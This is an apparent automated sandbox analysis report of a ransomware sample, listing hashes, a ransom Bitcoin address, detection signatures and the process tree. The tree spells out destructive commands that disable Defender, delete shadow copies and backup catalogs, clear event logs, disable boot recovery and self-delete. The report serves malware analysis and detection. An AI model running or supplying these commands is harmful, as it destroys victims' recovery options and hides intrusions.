Analysis
-
max time kernel
151s -
max time network
122s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
21/11/2021, 16:18
Static task
static1
Behavioral task
behavioral1
Sample
MoleculeV_.bin.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
MoleculeV_.bin.exe
Resource
win10-en-20211014
General
-
Target
MoleculeV_.bin.exe
-
Size
461KB
-
MD5
bb09e9b8daef63d4ebe21fcb2519c5d5
-
SHA1
9adacd3ed8963404925d72efa1acca50dd9673b8
-
SHA256
d47e0056a7336be404b2ddf56bdb6897046f6a6ddb0f38bb9f6674ca4c3eaf15
-
SHA512
18f6d6023d1922a6e81833ef294e7fba4dde436fd67727d30a5f7c9f0b564cd940dca58217222f54454d2177a2fd4303389f4d4e4cd6e2d0290309cfc85f6267
Malware Config
Extracted
C:\Users\Admin\Desktop\READ_IT.txt
1AcXKNDs71c1QZgVNvFZVwQgWNBQDjvT4H
Signatures
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4764 bcdedit.exe 4272 bcdedit.exe -
pid Process 4148 wbadmin.exe -
Executes dropped EXE 4 IoCs
pid Process 652 Molecule.exe 4144 2c818d6f-6b05-478c-8ce1-9d49a3874096.exe 4344 2c818d6f-6b05-478c-8ce1-9d49a3874096.exe 5040 2c818d6f-6b05-478c-8ce1-9d49a3874096.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows_Update.url MoleculeV_.bin.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows_Update.url MoleculeV_.bin.exe -
Loads dropped DLL 4 IoCs
pid Process 652 Molecule.exe 5040 2c818d6f-6b05-478c-8ce1-9d49a3874096.exe 4344 2c818d6f-6b05-478c-8ce1-9d49a3874096.exe 4144 2c818d6f-6b05-478c-8ce1-9d49a3874096.exe -
Obfuscated with Agile.Net obfuscator 6 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral2/files/0x00020000000197cf-269.dat agile_net behavioral2/files/0x00020000000197cf-275.dat agile_net behavioral2/files/0x000400000001aba4-604.dat agile_net behavioral2/files/0x000400000001aba4-605.dat agile_net behavioral2/files/0x000400000001aba4-606.dat agile_net behavioral2/files/0x000400000001aba4-602.dat agile_net -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\wallpaper.bmp" MoleculeV_.bin.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.2.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\WBEngine.1.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4304 vssadmin.exe -
Modifies Control Panel 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\Desktop\WallpaperStyle = "2" MoleculeV_.bin.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\Desktop\TileWallpaper = "0" MoleculeV_.bin.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3744 powershell.exe 3744 powershell.exe 3744 powershell.exe 2752 MoleculeV_.bin.exe 1184 powershell.exe 608 powershell.exe 896 powershell.exe 392 powershell.exe 676 powershell.exe 984 powershell.exe 892 powershell.exe 1368 powershell.exe 1528 powershell.exe 3132 powershell.exe 2032 powershell.exe 2976 powershell.exe 1184 powershell.exe 1184 powershell.exe 608 powershell.exe 608 powershell.exe 896 powershell.exe 896 powershell.exe 892 powershell.exe 892 powershell.exe 984 powershell.exe 984 powershell.exe 392 powershell.exe 392 powershell.exe 676 powershell.exe 676 powershell.exe 1368 powershell.exe 1368 powershell.exe 3132 powershell.exe 3132 powershell.exe 1528 powershell.exe 1528 powershell.exe 2032 powershell.exe 2032 powershell.exe 2976 powershell.exe 2976 powershell.exe 608 powershell.exe 892 powershell.exe 1184 powershell.exe 984 powershell.exe 896 powershell.exe 392 powershell.exe 676 powershell.exe 2752 MoleculeV_.bin.exe 2752 MoleculeV_.bin.exe 1368 powershell.exe 1528 powershell.exe 3132 powershell.exe 2032 powershell.exe 2976 powershell.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe 652 Molecule.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2752 MoleculeV_.bin.exe Token: SeDebugPrivilege 2752 MoleculeV_.bin.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeIncreaseQuotaPrivilege 3744 powershell.exe Token: SeSecurityPrivilege 3744 powershell.exe Token: SeTakeOwnershipPrivilege 3744 powershell.exe Token: SeLoadDriverPrivilege 3744 powershell.exe Token: SeSystemProfilePrivilege 3744 powershell.exe Token: SeSystemtimePrivilege 3744 powershell.exe Token: SeProfSingleProcessPrivilege 3744 powershell.exe Token: SeIncBasePriorityPrivilege 3744 powershell.exe Token: SeCreatePagefilePrivilege 3744 powershell.exe Token: SeBackupPrivilege 3744 powershell.exe Token: SeRestorePrivilege 3744 powershell.exe Token: SeShutdownPrivilege 3744 powershell.exe Token: SeDebugPrivilege 3744 powershell.exe Token: SeSystemEnvironmentPrivilege 3744 powershell.exe Token: SeRemoteShutdownPrivilege 3744 powershell.exe Token: SeUndockPrivilege 3744 powershell.exe Token: SeManageVolumePrivilege 3744 powershell.exe Token: 33 3744 powershell.exe Token: 34 3744 powershell.exe Token: 35 3744 powershell.exe Token: 36 3744 powershell.exe Token: SeDebugPrivilege 1184 powershell.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 896 powershell.exe Token: SeDebugPrivilege 392 powershell.exe Token: SeDebugPrivilege 676 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 892 powershell.exe Token: SeDebugPrivilege 1368 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 3132 powershell.exe Token: SeDebugPrivilege 2032 powershell.exe Token: SeDebugPrivilege 2976 powershell.exe Token: SeDebugPrivilege 2752 MoleculeV_.bin.exe Token: SeIncreaseQuotaPrivilege 608 powershell.exe Token: SeSecurityPrivilege 608 powershell.exe Token: SeTakeOwnershipPrivilege 608 powershell.exe Token: SeLoadDriverPrivilege 608 powershell.exe Token: SeSystemProfilePrivilege 608 powershell.exe Token: SeSystemtimePrivilege 608 powershell.exe Token: SeProfSingleProcessPrivilege 608 powershell.exe Token: SeIncBasePriorityPrivilege 608 powershell.exe Token: SeCreatePagefilePrivilege 608 powershell.exe Token: SeBackupPrivilege 608 powershell.exe Token: SeRestorePrivilege 608 powershell.exe Token: SeShutdownPrivilege 608 powershell.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeSystemEnvironmentPrivilege 608 powershell.exe Token: SeRemoteShutdownPrivilege 608 powershell.exe Token: SeUndockPrivilege 608 powershell.exe Token: SeManageVolumePrivilege 608 powershell.exe Token: 33 608 powershell.exe Token: 34 608 powershell.exe Token: 35 608 powershell.exe Token: 36 608 powershell.exe Token: SeBackupPrivilege 4904 vssvc.exe Token: SeRestorePrivilege 4904 vssvc.exe Token: SeAuditPrivilege 4904 vssvc.exe Token: SeIncreaseQuotaPrivilege 1184 powershell.exe Token: SeSecurityPrivilege 1184 powershell.exe Token: SeTakeOwnershipPrivilege 1184 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2752 wrote to memory of 3744 2752 MoleculeV_.bin.exe 69 PID 2752 wrote to memory of 3744 2752 MoleculeV_.bin.exe 69 PID 2752 wrote to memory of 1184 2752 MoleculeV_.bin.exe 72 PID 2752 wrote to memory of 1184 2752 MoleculeV_.bin.exe 72 PID 2752 wrote to memory of 608 2752 MoleculeV_.bin.exe 73 PID 2752 wrote to memory of 608 2752 MoleculeV_.bin.exe 73 PID 2752 wrote to memory of 896 2752 MoleculeV_.bin.exe 78 PID 2752 wrote to memory of 896 2752 MoleculeV_.bin.exe 78 PID 2752 wrote to memory of 676 2752 MoleculeV_.bin.exe 77 PID 2752 wrote to memory of 676 2752 MoleculeV_.bin.exe 77 PID 2752 wrote to memory of 984 2752 MoleculeV_.bin.exe 79 PID 2752 wrote to memory of 984 2752 MoleculeV_.bin.exe 79 PID 2752 wrote to memory of 392 2752 MoleculeV_.bin.exe 85 PID 2752 wrote to memory of 392 2752 MoleculeV_.bin.exe 85 PID 2752 wrote to memory of 892 2752 MoleculeV_.bin.exe 83 PID 2752 wrote to memory of 892 2752 MoleculeV_.bin.exe 83 PID 2752 wrote to memory of 1368 2752 MoleculeV_.bin.exe 82 PID 2752 wrote to memory of 1368 2752 MoleculeV_.bin.exe 82 PID 2752 wrote to memory of 2032 2752 MoleculeV_.bin.exe 92 PID 2752 wrote to memory of 2032 2752 MoleculeV_.bin.exe 92 PID 2752 wrote to memory of 1528 2752 MoleculeV_.bin.exe 86 PID 2752 wrote to memory of 1528 2752 MoleculeV_.bin.exe 86 PID 2752 wrote to memory of 3132 2752 MoleculeV_.bin.exe 89 PID 2752 wrote to memory of 3132 2752 MoleculeV_.bin.exe 89 PID 2752 wrote to memory of 2976 2752 MoleculeV_.bin.exe 87 PID 2752 wrote to memory of 2976 2752 MoleculeV_.bin.exe 87 PID 2752 wrote to memory of 3772 2752 MoleculeV_.bin.exe 94 PID 2752 wrote to memory of 3772 2752 MoleculeV_.bin.exe 94 PID 2752 wrote to memory of 652 2752 MoleculeV_.bin.exe 99 PID 2752 wrote to memory of 652 2752 MoleculeV_.bin.exe 99 PID 2752 wrote to memory of 652 2752 MoleculeV_.bin.exe 99 PID 2752 wrote to memory of 4460 2752 MoleculeV_.bin.exe 100 PID 2752 wrote to memory of 4460 2752 MoleculeV_.bin.exe 100 PID 2752 wrote to memory of 4492 2752 MoleculeV_.bin.exe 101 PID 2752 wrote to memory of 4492 2752 MoleculeV_.bin.exe 101 PID 4460 wrote to memory of 4276 4460 cmd.exe 106 PID 4460 wrote to memory of 4276 4460 cmd.exe 106 PID 3772 wrote to memory of 4304 3772 cmd.exe 104 PID 3772 wrote to memory of 4304 3772 cmd.exe 104 PID 4492 wrote to memory of 4408 4492 cmd.exe 105 PID 4492 wrote to memory of 4408 4492 cmd.exe 105 PID 652 wrote to memory of 4144 652 Molecule.exe 109 PID 652 wrote to memory of 4144 652 Molecule.exe 109 PID 652 wrote to memory of 4144 652 Molecule.exe 109 PID 652 wrote to memory of 4344 652 Molecule.exe 110 PID 652 wrote to memory of 4344 652 Molecule.exe 110 PID 652 wrote to memory of 4344 652 Molecule.exe 110 PID 652 wrote to memory of 5040 652 Molecule.exe 111 PID 652 wrote to memory of 5040 652 Molecule.exe 111 PID 652 wrote to memory of 5040 652 Molecule.exe 111 PID 3772 wrote to memory of 4684 3772 cmd.exe 112 PID 3772 wrote to memory of 4684 3772 cmd.exe 112 PID 3772 wrote to memory of 4956 3772 cmd.exe 114 PID 3772 wrote to memory of 4956 3772 cmd.exe 114 PID 3772 wrote to memory of 4608 3772 cmd.exe 115 PID 3772 wrote to memory of 4608 3772 cmd.exe 115 PID 3772 wrote to memory of 4692 3772 cmd.exe 116 PID 3772 wrote to memory of 4692 3772 cmd.exe 116 PID 3772 wrote to memory of 4764 3772 cmd.exe 117 PID 3772 wrote to memory of 4764 3772 cmd.exe 117 PID 3772 wrote to memory of 4272 3772 cmd.exe 118 PID 3772 wrote to memory of 4272 3772 cmd.exe 118 PID 3772 wrote to memory of 4148 3772 cmd.exe 119 PID 3772 wrote to memory of 4148 3772 cmd.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\MoleculeV_.bin.exe"C:\Users\Admin\AppData\Local\Temp\MoleculeV_.bin.exe"1⤵
- Drops startup file
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3772 -
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:4304
-
-
C:\Windows\System32\Wbem\WMIC.exeWMIC shadowcopy delete3⤵PID:4684
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵PID:4956
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵PID:4608
-
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵PID:4692
-
-
C:\Windows\system32\bcdedit.exeBcdedit.exe /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:4764
-
-
C:\Windows\system32\bcdedit.exeBcdedit.exe /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:4272
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog3⤵
- Deletes backup catalog
- Drops file in Windows directory
PID:4148
-
-
-
C:\Users\Admin\Molecule.exe"C:\Users\Admin\Molecule.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:652 -
C:\ProgramData\Microsoft\Crypto\SystemKeys\{2c818d6f-6b05-478c-8ce1-9d49a3874096}\2c818d6f-6b05-478c-8ce1-9d49a3874096.exe"C:\ProgramData\Microsoft\Crypto\SystemKeys\{2c818d6f-6b05-478c-8ce1-9d49a3874096}\2c818d6f-6b05-478c-8ce1-9d49a3874096.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4144
-
-
C:\ProgramData\Microsoft\Crypto\SystemKeys\{2c818d6f-6b05-478c-8ce1-9d49a3874096}\2c818d6f-6b05-478c-8ce1-9d49a3874096.exe"C:\ProgramData\Microsoft\Crypto\SystemKeys\{2c818d6f-6b05-478c-8ce1-9d49a3874096}\2c818d6f-6b05-478c-8ce1-9d49a3874096.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4344
-
-
C:\ProgramData\Microsoft\Crypto\SystemKeys\{2c818d6f-6b05-478c-8ce1-9d49a3874096}\2c818d6f-6b05-478c-8ce1-9d49a3874096.exe"C:\ProgramData\Microsoft\Crypto\SystemKeys\{2c818d6f-6b05-478c-8ce1-9d49a3874096}\2c818d6f-6b05-478c-8ce1-9d49a3874096.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MoleculeV_.bin.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del ""2⤵
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:4408
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵PID:256
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1696
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:4280